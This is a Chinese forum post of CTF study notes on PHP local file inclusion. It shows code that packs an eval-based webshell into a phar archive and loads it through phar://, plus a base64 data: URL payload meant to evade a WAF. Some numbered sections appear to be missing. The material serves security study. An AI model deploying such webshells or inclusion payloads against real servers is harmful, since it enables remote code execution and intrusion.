文件包含漏洞(二)
本帖最后由 人=族 于 2017-4-9 19:13 编辑之前已经总结了一次文件包含漏洞相关的知识点,最近一段时间做CTF又遇到了不少以前没见过的包含新姿势,这里在总结一下,以后看的时候方便一些。
phar LFI0x01 什么是phar文件phar是一个文件归档的包,类似于Java中的Jar文件,方便了PHP模块的迁移。
php中默认安装了这个模块。
0x02 创建一个phar文件在创建phar文件的时候要注意phar.readonly这个参数要为off,否则phar文件不可写。
1
2
3
4
5
6
7
8
9
10
11
<?php
$p = new phar("shell.phar", 0 , "shell.phar");
$p->startBuffering();
$p['shell.php'] = '<?php phpinfo(); @eval($_POST)?>';
$p->setStub("<?php Phar::mapPhar('shell.phar'); __HALT_COMPILER?>");
?>
运行以上代码后会在当前目录下生成一个名为shell.phar的文件,这个文件可以被include,file_get_contents等函数利用0x03 利用phar利用phar文件的方法很简单,利用phar特定的格式就可以加以利用
1
2
3
4
5
<?php
include 'phar://shell.phar/shell.php';
?>
这样就可以成功把shell包含进来。当我们把shell.phar文件重命名为shell.aaa等一些无效的后缀名时,一样可以使用,说明了phar文件不受文件格式的影响。http://www.blbana.cc/wp-content/uploads/2016/12/d1660fedd8e4cfacdc61fbb3d39e1792.png
(注意:需要allow_url_include = On 且 PHP >= 5.2.0)
0x06 data URL代码执行我们可以将攻击代码转换为data:URL形式进行攻击,但是直接在URL连接中出现一些敏感字符,会导致被waf检测,所以我们需要给攻击代码进行base64编码。
http://localhost/test/phar%20LFI/postinput.php?file=data:text/plain;base64,PD9waHAKcGhwaW5mbygpOwo/Pg==
http://www.blbana.cc/wp-content/uploads/2016/12/90d47eb1cb5e3f380948909548dee61d.png
页:
[1]